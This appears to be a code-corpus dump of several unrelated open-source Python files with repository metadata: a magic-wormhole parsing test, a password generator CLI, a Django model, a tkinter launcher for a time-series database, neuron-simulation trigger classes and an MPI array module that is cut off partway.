warner/magic-wormhole | src/wormhole/test/dilate/test_parse.py | 1 | 2402 | from __future__ import print_function, unicode_literals
import mock
from twisted.trial import unittest
from ..._dilation.connection import (parse_record, encode_record,
KCM, Ping, Pong, Open, Data, Close, Ack)
class Parse(unittest.TestCase):
def test_parse(self):
self.assertEqual(parse_record(b"\x00"), KCM())
self.assertEqual(parse_record(b"\x01\x55\x44\x33\x22"),
Ping(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x02\x55\x44\x33\x22"),
Pong(ping_id=b"\x55\x44\x33\x22"))
self.assertEqual(parse_record(b"\x03\x00\x00\x02\x01\x00\x00\x01\x00"),
Open(scid=513, seqnum=256))
self.assertEqual(parse_record(b"\x04\x00\x00\x02\x02\x00\x00\x01\x01dataaa"),
Data(scid=514, seqnum=257, data=b"dataaa"))
self.assertEqual(parse_record(b"\x05\x00\x00\x02\x03\x00\x00\x01\x02"),
Close(scid=515, seqnum=258))
self.assertEqual(parse_record(b"\x06\x00\x00\x01\x03"),
Ack(resp_seqnum=259))
with mock.patch("wormhole._dilation.connection.log.err") as le:
with self.assertRaises(ValueError):
parse_record(b"\x07unknown")
self.assertEqual(le.mock_calls,
[mock.call("received unknown message type: {}".format(
b"\x07unknown"))])
def test_encode(self):
self.assertEqual(encode_record(KCM()), b"\x00")
self.assertEqual(encode_record(Ping(ping_id=b"ping")), b"\x01ping")
self.assertEqual(encode_record(Pong(ping_id=b"pong")), b"\x02pong")
self.assertEqual(encode_record(Open(scid=65536, seqnum=16)),
b"\x03\x00\x01\x00\x00\x00\x00\x00\x10")
self.assertEqual(encode_record(Data(scid=65537, seqnum=17, data=b"dataaa")),
b"\x04\x00\x01\x00\x01\x00\x00\x00\x11dataaa")
self.assertEqual(encode_record(Close(scid=65538, seqnum=18)),
b"\x05\x00\x01\x00\x02\x00\x00\x00\x12")
self.assertEqual(encode_record(Ack(resp_seqnum=19)),
b"\x06\x00\x00\x00\x13")
with self.assertRaises(TypeError) as ar:
encode_record("not a record")
self.assertEqual(str(ar.exception), "not a record")
| mit | 7,898,744,829,652,153,000 | 53.590909 | 85 | 0.579517 | false | 3.095361 | false | false | false |
rcabralc/pyssword | src/pyssword.py | 1 | 12069 | #!/usr/bin/env python
# vim: fdm=marker
"""
pyssword - Password generator
Generates a random password with a specified entropy within specified character
sets. Uses /dev/urandom for random info by default.
Usage:
pyssword [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword --read [--lower --upper --numbers --symbols --entropy=bits --no-info --radix=radix --one-based]
pyssword --die=radix [--lower --upper --numbers --symbols --entropy=bits --no-info]
pyssword passphrase [--entropy=bits --no-info]
pyssword passphrase --read [--entropy=bits --no-info --radix=radix --one-based]
pyssword passphrase --die=radix [--entropy=bits --no-info]
pyssword passphrase --info
pyssword --help
Options:
passphrase
Output a passphrase instead of a password. All characters are in
lowercase. This uses the EFF's long list, as described in
https://www.eff.org/deeplinks/2016/07/new-wordlists-random-passphrases
-e bits --entropy=bits
[Default: 128]
The entropy, in bits, of the password. This is a minimum value; the
final entropy may be a bit higher than specified due to a round up for
an integral number of random inputs.
-l --lower
Use lowercase letters.
-u --upper
Use uppercase letters.
-n --numbers
Use numbers.
-s --symbols
Use symbols.
--info
Ask for a passphrase (a white-space separated list of words of the
current word list) from stdin. If connected to a terminal, the user
will be prompted to enter the passphrase. Any word not in the word
list will cause an error.
Outputs the passphrase info.
--no-info
Print only the password, without additional info.
-r --read
Ask for random information instead of relying on /dev/urandom. Numbers
are collected from stdin until enough entropy has been achieved. If
connected to a terminal, the user will be prompted to manually enter
random numbers.
Note: In platforms which have no /dev/urandom, this is the only way to
use the script.
You can use any source of random data. But keep in mind that in this
case the strength of the generated password is entirely dependent on
the random nature of the numbers provided. The best way to do so is to
use real, fair dice, and to actually throw them for getting random
input values. Also, numbers are not assumed to be given in base-10 by
default (see `--radix').
When connecting stdin to a pipe, there's the possibility of not enough
numbers be provided, in which case the script will just block
endlessly, waiting for input. Be sure to provide enough input in such
cases. For the math inclined, the minimum quantity of numbers needed
for a given radix and entropy (in bits) is:
total = round_up(entropy_bits / log(radix, 2))
Or you can just run the program without a pipe and wait for it to ask
you for numbers. The prompt has the actual quantity of expected
numbers. With this information, cancel it (Control-C) and try again
using a pipe.
--radix=radix
[Default: 256]
The radix used for random input numbers. Only used if `--read' is
given. Values range from 0 up to but excluding `radix' (see
`--one-based' for ranging values from 1 up to and including `radix').
-1 --one-based
Whether or not numbers are zero- or one- based. They are assumed to be
zero-based by default.
-d radix --die=radix
Treat input as a die with `radix' sides. Shortcut for `--read',
`--radix=radix' and `--one-based'.
-h --help
Show this.
Examples:
Without arguments, all characters are used to compute a password with the
default entropy (lowercase, uppercase, numbers and symbols):
$ pyssword --no-info
&I3`?)R0h0Co0H[>k)|\\
You can restrict the characters used and use a specific entropy:
$ pyssword --lower --numbers --entropy 64 --no-info
azs99hrimiov0g
By default, that is, without --no-info, additional information is shown:
$ pyssword --entropy 30
Actual entropy: 32.772944258388186
Set length: 94
Password: h+!:4
The full character set has 94 letters/numbers/symbols.
The source of random information can be changed. For using 16 bytes (that
is, 128 bits) from /dev/random do the following:
$ dd if=/dev/random bs=16 count=1 2>/dev/null | od -t u1 -A n -v | pyssword --read --no-info
)PN"GgyF%`#TdlI3IweV
Using real dice with six sides for generating a 26-bit passphrase:
$ pyssword passphrase --read --radix 6 --one-based --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using the shortcut option --die:
$ pyssword passphrase --die 6 --entropy 26
1/11: 1 2 3 4 5 6 1 2 3 4 5
Actual entropy: 28.434587507932722
Set length: 7776
Password: abacus dispatch arousal
The same as above, using a pipe and without info:
$ cat - > /tmp/rolls
1 2 3 4 5 6 1 2 3 4 5
<Control-D>
$ cat /tmp/rolls | pyssword passphrase -d 6 -e 26 --no-info
abacus dispatch arousal
$ shred -u /tmp/rolls
Note: the three examples above returned three words, but the resulting
    entropy is not 38.8 (each word in a Diceware-style list provides about 12.9 bits,
which is what you can get from a list with 7776 words). This happens
because in order to get at least 26 bits of entropy eleven die rolls are
needed, but then you'll get 28.4 bits. This value exceeds the entropy
provided by only two words (25.8 bits), and a third one is needed for
accounting for the difference and also to satisfy the requirement of at
least 26 bits. The entropy which exists is the same that gets in: no
entropy is created out of thin air, and the script makes its best efforts
to also not waste it.
"""
from math import ceil, log
import docopt
import itertools
import os
import pkg_resources
import random
import sys
WORDS = []
wordsfile = pkg_resources.resource_stream(
__name__,
'eff_large_wordlist.txt'
)
for wordline in wordsfile:
_base6index, word = wordline.rstrip().split(b'\t')
WORDS.append(word.decode('us-ascii'))
FULL = [chr(v) for v in range(33, 127)]
UPPER = [chr(v) for v in range(65, 65 + 26)]
LOWER = [chr(v) for v in range(97, 97 + 26)]
NUMBERS = [chr(v) for v in range(48, 48 + 10)]
SYMBOLS = list(set(FULL) - set(NUMBERS) - set(UPPER) - set(LOWER))
class IntOption:
def __init__(self, args, option):
self.option = option
try:
self.value = int(args[option])
except ValueError:
error("{} is not a valid integer".format(option))
def get(self):
return self.value
def greater_than(self, min):
if self.value <= min:
error("{} must be greater than {}".format(self.option, min))
return self
def less_than(self, max):
if self.value >= max:
error("{} must be less than {}".format(self.option, max))
return self
class Number:
def __init__(self, radix, digits):
assert radix > 1
for digit in digits:
assert 0 <= digit < radix
self._radix = radix
self._digits = digits
self.max_within_length = radix**len(digits)
self.bits = log(self.max_within_length, 2)
def convert(self, radix):
n = 0
exp = 0
minlength = ceil(log(self.max_within_length, radix))
for digit in reversed(self._digits):
n += digit * (self._radix**exp)
exp += 1
if n == 0:
digits = [0]
else:
digits = []
while n:
r = n % radix
n = n // radix
digits.append(r)
padding = [0] * max(minlength - len(digits), 0)
return self.__class__(radix, padding + list(reversed(digits)))
def __iter__(self):
return iter(self._digits)
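# Illustrative example: Number(6, [1, 2, 3]) encodes 1*36 + 2*6 + 3 = 51;
# convert(2) pads to ceil(log2(216)) = 8 digits: [0, 0, 1, 1, 0, 0, 1, 1].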
class TokenSet(tuple):
def __new__(cls, tokens):
if len(tokens) < 2:
error("Not enough tokens to choose from. Use a longer set.")
return tuple.__new__(cls, tokens)
@property
def bits(self):
return log(len(self), 2)
def select(self, number):
return [self[i] for i in number.convert(len(self))]
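    # Illustrative example: TokenSet(['a', 'b', 'c']).select(Number(3, [0, 2, 1]))
    # returns ['a', 'c', 'b'] -- each base-3 digit indexes into the set.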
class Password:
def __init__(self, tokenset, number, separator):
self.set = tokenset
self.entropy = number.bits
self.value = tokenset.select(number)
self.separator = separator
def __str__(self):
return self.separator.join(self.value)
def error(message):
print(message)
sys.exit(1)
def run(args):
is_passphrase = args['passphrase']
if is_passphrase:
tokens = WORDS
else:
tokens = []
tokens.extend(args['--lower'] and LOWER or [])
tokens.extend(args['--upper'] and UPPER or [])
tokens.extend(args['--numbers'] and NUMBERS or [])
tokens.extend(args['--symbols'] and SYMBOLS or [])
tokens = tokens if len(tokens) else FULL
assert len(tokens) == len(set(tokens))
tokenset = TokenSet(tokens)
if args['--die']:
args['--read'] = True
args['--radix'] = args['--die']
args['--one-based'] = True
if args['--info']:
radix = len(tokens)
generator, entropy = read_words(tokens)
else:
entropy = IntOption(args, '--entropy').greater_than(0).get()
if args['--read']:
radix = IntOption(args, '--radix').greater_than(1).get()
generator = user_generator(entropy, radix, args['--one-based'])
else:
rng = random.SystemRandom()
radix = len(tokens)
generator = random_generator(rng, radix)
total = ceil(entropy / log(radix, 2))
inputs = list(itertools.islice(source(generator), total))
number = Number(radix, inputs)
pw = Password(tokenset, number, ' ' if is_passphrase else '')
if args['--no-info']:
print(pw)
else:
print("Actual entropy: {}\n"
"Set length: {}\n"
"Password: {}"
"".format(pw.entropy, len(pw.set), pw))
def random_generator(rng, radix):
while True:
yield rng.randrange(radix)
def user_generator(desired_entropy, radix, onebased):
total = ceil(desired_entropy / log(radix, 2))
promptsize = 2 * len(str(total)) + len('/')
count = 0
offset = -1 if onebased else 0
def readline(line):
values = line.strip().split(' ')
try:
values = [int(value) + offset for value in values if value]
        except ValueError:  # ignore lines that are not whole numbers
values = []
yield from (v for v in values if 0 <= v < radix)
while True:
if sys.stdin.isatty():
prompt = '{}/{}'.format(count + 1, total)
print(prompt.rjust(promptsize), end=': ')
sys.stdout.flush()
for value in readline(sys.stdin.readline()):
count += 1
yield value
def read_words(tokens):
if sys.stdin.isatty():
print('Enter words separated by space', end=': ')
sys.stdout.flush()
values = []
for word in sys.stdin.readline().strip().split(' '):
try:
values.append(tokens.index(word))
except ValueError:
error("{} is not part of the word list.".format(word))
return (values, log(len(tokens)**len(values), 2))
def source(*inputs):
return itertools.chain(*[iter(input) for input in inputs])
def main():
try:
return run(docopt.docopt(__doc__))
except KeyboardInterrupt:
return 1
if __name__ == '__main__':
sys.exit(main())
| mit | -8,042,619,878,728,763,000 | 29.946154 | 108 | 0.607755 | false | 3.824144 | false | false | false |
uclouvain/OSIS-Louvain | base/models/abstracts/abstract_education_group_achievement.py | 2 | 2574 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2017 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from ckeditor.fields import RichTextField
from django.conf import settings
from django.db import models
from django.db.models import F
from django.utils.translation import gettext_lazy as _
from ordered_model.admin import OrderedModelAdmin
from ordered_model.models import OrderedModel
class AbstractEducationGroupAchievementAdmin(OrderedModelAdmin):
list_display = ('code_name', 'order', 'move_up_down_links')
readonly_fields = ['order']
search_fields = ['code_name', 'order']
class AbstractEducationGroupAchievementQuerySet(models.QuerySet):
def annotate_text(self, language_code):
return self.annotate(
text=F('french_text') if language_code == settings.LANGUAGE_CODE_FR else F('english_text')
)
class AbstractEducationGroupAchievement(OrderedModel):
external_id = models.CharField(max_length=100, blank=True, null=True, db_index=True)
changed = models.DateTimeField(null=True, auto_now=True)
code_name = models.CharField(max_length=100, verbose_name=_('code'))
english_text = RichTextField(null=True, verbose_name=_('text in English'))
french_text = RichTextField(null=True, verbose_name=_('text in French'))
class Meta:
abstract = True
objects = AbstractEducationGroupAchievementQuerySet.as_manager()
| agpl-3.0 | -3,911,626,178,749,473,000 | 42.610169 | 102 | 0.692577 | false | 3.989147 | false | false | false |
Planet-Nine/cs207project | go_server_SAX.py | 1 | 8656 | #!/usr/bin/env python3
from tsdb import TSDBServer
from tsdb.persistentdb import PersistentDB
import timeseries as ts
import tkinter as tk
identity = lambda x: x
schema = {
'pk': {'convert': identity, 'index': None,'type':str}, #will be indexed anyways
'ts': {'convert': identity, 'index': None},
'order': {'convert': int, 'index': 1,'type':int},
'blarg': {'convert': int, 'index': 1,'type' : int},
'useless': {'convert': identity, 'index': None, 'type' : str},
'mean': {'convert': float, 'index': 1,'type' : float},
'std': {'convert': float, 'index': 1, 'type' : float},
'vp': {'convert': bool, 'index': 1, 'type' : bool}
}
#schema = {
# 'pk': {'convert': identity, 'index': None, 'type':str}, #will be indexed anyways
# 'ts': {'convert': identity, 'index': None},
#}
NUMVPS = 5
def main(load=False, dbname="db", overwrite=False, threshold = 10, wordlength = 16, tslen = 256, cardinality = 64):
# we augment the schema by adding columns for 5 vantage points
#for i in range(NUMVPS):
# schema["d_vp-{}".format(i)] = {'convert': float, 'index': 1}
db = PersistentDB(schema, 'pk',load=load, dbname=dbname, overwrite=overwrite, threshold = threshold, wordlength = wordlength, tslen = tslen, cardinality = cardinality)
server = TSDBServer(db)
server.run()
if __name__=='__main__':
class SampleApp(tk.Tk):
def __init__(self):
tk.Tk.__init__(self)
self.destroy()
self.master = tk.Tk()
self.master2 = None
self.label = tk.Label(self.master,text="""
This is a brief introduction to the similarity search for time series
using the iSAX index.
In the next window you will be asked to input some values. The first
            determines whether or not to load the database from an existing one.
            You will next be asked to provide a database name for loading or writing.
            Next, whether to overwrite the existing database, in the event that one
            with the given name exists. You will further be asked to give the
            cardinality of the iSAX representation to be used, which is essentially
            the number of discrete symbol levels (horizontal slices of the value
            range) used for indexing. Cardinalities greater than 64 are not supported
            at the moment. The next value is a threshold, the number of time series to
            hold in a leaf node. Then the word length, the number of segments or
            vertical slices along the time axis used for indexing the
            time series. Finally, please provide the time series length, which is the number
of data points you wish your time series to be interpolated to for uniformization
of the time series. These interpolation points will be evenly spaced between the
            maximum and minimum time values, including the endpoints. If no values
            are input, defaults will be used. Defaults are indicated by [...].
""",justify = 'left')
self.button = tk.Button(self.master, text="continue", command=self.on_button)
self.label.pack()
self.button.pack()
def on_button(self):
if self.master2:
self.master2.destroy()
else:
self.master.destroy()
self.card = 64
self.dbn = "db"
self.th = 10
self.wl = 8
self.tslen = 256
self.master1 = tk.Tk()
self.label2 = tk.Label(self.master1,text="Load (true or false) [False]: ")
self.entry2 = tk.Entry(self.master1)
self.label3 = tk.Label(self.master1,text="Database name (no spaces) [db]: ")
self.entry3 = tk.Entry(self.master1)
self.label4 = tk.Label(self.master1,text="Overwrite (true or false) [False]: ")
self.entry4 = tk.Entry(self.master1)
self.label1 = tk.Label(self.master1,text="Cardinality (must be a power of 2) [64]: ")
self.entry1 = tk.Entry(self.master1)
self.label5 = tk.Label(self.master1,text="Threshold (must be a positive integer) [10]: ")
self.entry5 = tk.Entry(self.master1)
self.label6 = tk.Label(self.master1,text="Word length (must be a power of 2) [8]: ")
self.entry6 = tk.Entry(self.master1)
self.label7 = tk.Label(self.master1,text="Time series length (must be a power of 2) [256]: ")
self.entry7 = tk.Entry(self.master1)
self.button = tk.Button(self.master1, text="continue", command=self.on_button1)
self.label2.pack()
self.entry2.pack()
self.label3.pack()
self.entry3.pack()
self.label4.pack()
self.entry4.pack()
self.label1.pack()
self.entry1.pack()
self.label5.pack()
self.entry5.pack()
self.label6.pack()
self.entry6.pack()
self.label7.pack()
self.entry7.pack()
self.button.pack()
def on_button1(self):
self.master2 = tk.Tk()
card = self.entry1.get()
if card:
try:
self.card = int(card)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the cardinality.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.ld = self.entry2.get()
if self.ld:
if self.ld[0].lower() == 't':
self.ld = True
else:
self.ld = False
else:
self.ld = False
dbn = self.entry3.get()
if dbn:
self.dbn = dbn
self.ovrw = self.entry4.get()
if self.ovrw:
if self.ovrw[0].lower() == 't':
self.ovrw = True
else:
self.ovrw = False
else:
self.ovrw = False
th = self.entry5.get()
wl = self.entry6.get()
tslen = self.entry7.get()
if th:
try:
self.th = int(th)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the threshold.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if wl:
try:
self.wl = int(wl)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the word length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
if tslen:
try:
self.tslen = int(tslen)
except:
self.label_1 = tk.Label(self.master2,text="Please enter a number for the time series length.")
self.button1 = tk.Button(self.master2, text="continue", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack()
self.label_1 = tk.Label(self.master2,text="Is the following correct?\n\nLoad: "+str(self.ld)+'\n\nDatabase name: '+str(self.dbn)+'\n\nOverwrite: '+str(self.ovrw)+'\n\nCardinality: '+str(self.card)+'\n\nThreshold: '+str(self.th)+'\n\nWord length: '+str(self.wl)+'\n\nTime series length: '+str(self.tslen)+'\n\n',justify = 'left')
self.button1 = tk.Button(self.master2, text="yes", command=self.on_button2)
self.button2 = tk.Button(self.master2, text="no", command=self.on_button)
self.master1.destroy()
self.label_1.pack()
self.button1.pack(side='right')
self.button2.pack(side='right')
def on_button2(self):
self.master2.destroy()
main(load=self.ld, dbname=self.dbn, overwrite=self.ovrw, threshold = self.th, wordlength = self.wl, tslen = self.tslen, cardinality = self.card)
app = SampleApp()
app.mainloop()
| mit | -355,031,898,191,861,250 | 44.563158 | 340 | 0.547135 | false | 3.853963 | false | false | false |
mikehulluk/morphforge | src/morphforge/simulation/base/synaptictriggers/__init__.py | 1 | 2980 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------
from morphforge.simulation.base.networks import SynapticTrigger
from morphforge.simulation.base.networks import PreSynapticTypes
from morphforge.traces.eventset import EventSet
class SynapticTriggerByVoltageThreshold(SynapticTrigger):
def __init__(self, cell_location, voltage_threshold, delay, **kwargs):
super(SynapticTriggerByVoltageThreshold, self).__init__(**kwargs)
self.cell_location = cell_location
self.voltage_threshold = voltage_threshold
self.delay = delay
def get_presynaptic_cell_location(self):
return self.cell_location
def get_presynaptic_cell(self):
return self.cell_location.cell
def get_type(self):
return PreSynapticTypes.Cell
def get_summary_string(self):
return '%s: [threshold: %s]'%( self.cell_location.get_location_description_str(), self.voltage_threshold )
class SynapticTriggerAtTimes(SynapticTrigger):
def __init__(self, time_list, **kwargs):
super(SynapticTriggerAtTimes, self).__init__(**kwargs)
# Convert into an event set
if not isinstance(time_list, EventSet):
time_list = EventSet(time_list)
self.time_list = time_list
def get_presynaptic_cell(self):
return None
def get_type(self):
return PreSynapticTypes.FixedTiming
def get_summary_string(self):
return 'At times: %s (ms)'%( self.time_list.times_in_np_array_ms() )
| bsd-2-clause | -2,459,074,456,524,546,600 | 36.721519 | 114 | 0.692617 | false | 4.238976 | false | false | false |
mpi-array/mpi_array | mpi_array/locale.py | 1 | 30917 | """
==================================
The :mod:`mpi_array.locale` Module
==================================
Defines :obj:`LndarrayProxy` class and factory functions for
creating multi-dimensional arrays where memory is allocated
using :meth:`mpi4py.MPI.Win.Allocate_shared` or :meth:`mpi4py.MPI.Win.Allocate`.
Classes
=======
..
Special template for mpi_array.locale.LndarrayProxy to avoid numpydoc
documentation style sphinx warnings/errors from numpy.ndarray inheritance.
.. autosummary::
:toctree: generated/
:template: autosummary/inherits_ndarray_class.rst
   lndarray - Sub-class of :obj:`numpy.ndarray` which uses an MPI-allocated memory buffer.
.. autosummary::
:toctree: generated/
:template: autosummary/class.rst
LndarrayProxy - Thin container for :obj:`lndarray` which provides convenience views.
PartitionViewSlices - Container for per-rank slices for created locale extent array views.
Factory Functions
=================
.. autosummary::
:toctree: generated/
empty - Create uninitialised array.
empty_like - Create uninitialised array same size/shape as another array.
zeros - Create zero-initialised array.
zeros_like - Create zero-initialised array same size/shape as another array.
ones - Create one-initialised array.
ones_like - Create one-initialised array same size/shape as another array.
copy - Create a replica of a specified array.
Utilities
=========
.. autosummary::
:toctree: generated/
NdarrayMetaData - Strides, offset and order info.
"""
from __future__ import absolute_import
import sys as _sys
import numpy as _np
import mpi4py.MPI as _mpi
import array_split as _array_split
from array_split.split import convert_halo_to_array_form as _convert_halo_to_array_form
import collections as _collections
from .license import license as _license, copyright as _copyright, version as _version
from .comms import create_distribution, get_win_memory
from .distribution import LocaleExtent as _LocaleExtent
from .distribution import HaloSubExtent as _HaloSubExtent
from .distribution import IndexingExtent as _IndexingExtent
from .utils import log_shared_memory_alloc as _log_shared_memory_alloc
from .utils import log_memory_alloc as _log_memory_alloc
from . import logging as _logging
__author__ = "Shane J. Latham"
__license__ = _license()
__copyright__ = _copyright()
__version__ = _version()
class NdarrayMetaData(object):
"""
Encapsulates, strides, offset and order argument of :meth:`LndarrayProxy.__new__`.
"""
def __init__(self, offset, strides, order):
"""
Construct.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer.
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
object.__init__(self)
self._strides = strides
self._offset = offset
self._order = order
@property
def order(self):
return self._order
class win_lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which allocates buffer using
MPI window allocated memory.
"""
def __new__(
cls,
shape,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
comm=None,
root_rank=0
):
"""
        Construct. Allocates shared-memory (:func:`mpi4py.MPI.Win.Allocate_shared`)
buffer when :samp:`{comm}.size > 1`. Uses :func:`mpi4py.MPI.Win.Allocate`
to allocate buffer when :samp:`{comm}.size == 1`.
:type shape: :samp:`None` or sequence of :obj:`int`
        :param shape: **Local** shape of the array; on the root rank this
           determines the size of the allocated buffer.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type comm: :obj:`mpi4py.Comm`
:param comm: Communicator used for allocating MPI window memory.
:type root_rank: :obj:`int`
:param root_rank: Rank of root process which allocates the shared memory.
"""
dtype = _np.dtype(dtype)
if comm is None:
raise ValueError("Got comm is None, require comm to be a valid mpi4py.MPI.Comm object")
if comm is _mpi.COMM_NULL:
raise ValueError(
"Got comm is COMM_NULL, require comm to be a valid mpi4py.MPI.Comm object"
)
if buffer is None:
num_rank_bytes = 0
rank_shape = shape
if comm.rank == root_rank:
num_rank_bytes = int(_np.product(rank_shape) * dtype.itemsize)
else:
rank_shape = tuple(_np.zeros_like(rank_shape))
logger = _logging.get_rank_logger(__name__ + "." + cls.__name__)
if (_mpi.VERSION >= 3) and (comm.size > 1):
_log_shared_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = \
_mpi.Win.Allocate_shared(
num_rank_bytes,
dtype.itemsize,
comm=comm
)
_log_shared_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buf_isize_pair = win.Shared_query(0)
buffer = buf_isize_pair[0]
else:
_log_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = _mpi.Win.Allocate(num_rank_bytes, dtype.itemsize, comm=comm)
_log_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buffer = get_win_memory(win)
buffer = _np.array(buffer, dtype='B', copy=False)
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._comm = comm
self._win = win
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._comm = getattr(obj, '_comm', None)
self._win = getattr(obj, '_win', None)
@property
def comm(self):
"""
The :obj:`mpi4py.MPI.Comm` communicator which was collectively used to allocate
the buffer (memory) for this array.
"""
return self._comm
@property
def win(self):
"""
The :obj:`mpi4py.MPI.Win` window which was created when allocating
the buffer (memory) for this array.
"""
return self._win
def free(self):
"""
Collective (over all processes in :attr:`comm`) free the MPI window
and associated memory buffer.
"""
self.shape = tuple(_np.zeros_like(self.shape))
if self._win is not None:
self._win.Free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
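# Minimal usage sketch for ``win_lndarray`` (illustrative only, not part of the
# original module; assumes an initialised MPI environment):
#
#   import mpi4py.MPI as mpi
#   with win_lndarray((16, 16), dtype="float64", comm=mpi.COMM_WORLD) as ary:
#       if ary.comm.rank == 0:
#           ary[...] = 0.0      # root rank initialises the shared buffer
#       ary.comm.Barrier()      # all ranks synchronise before reading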
class lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which requires :samp:`{buffer}` to
be specified for instantiation.
"""
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None
):
"""
        Construct. The :samp:`{buffer}` argument must be specified
        (:obj:`ValueError` is raised when :samp:`{buffer} is None`).
        :type shape: :samp:`None` or sequence of :obj:`int`
        :param shape: **Local** shape of the array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
if buffer is None:
raise ValueError("Got buffer=None, require buffer allocated from LocaleComms.")
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._md = NdarrayMetaData(offset=offset, strides=strides, order=order)
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._md = getattr(obj, '_md', None)
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._md
def free(self):
"""
Release reference to buffer, and zero-ise :samp:`self.shape`.
"""
pass
PartitionViewSlices = \
_collections.namedtuple(
"PartitionViewSlices",
[
"rank_view_slice_n",
"rank_view_slice_h",
"rank_view_relative_slice_n",
"rank_view_partition_slice_h",
"lndarray_view_slice_n"
]
)
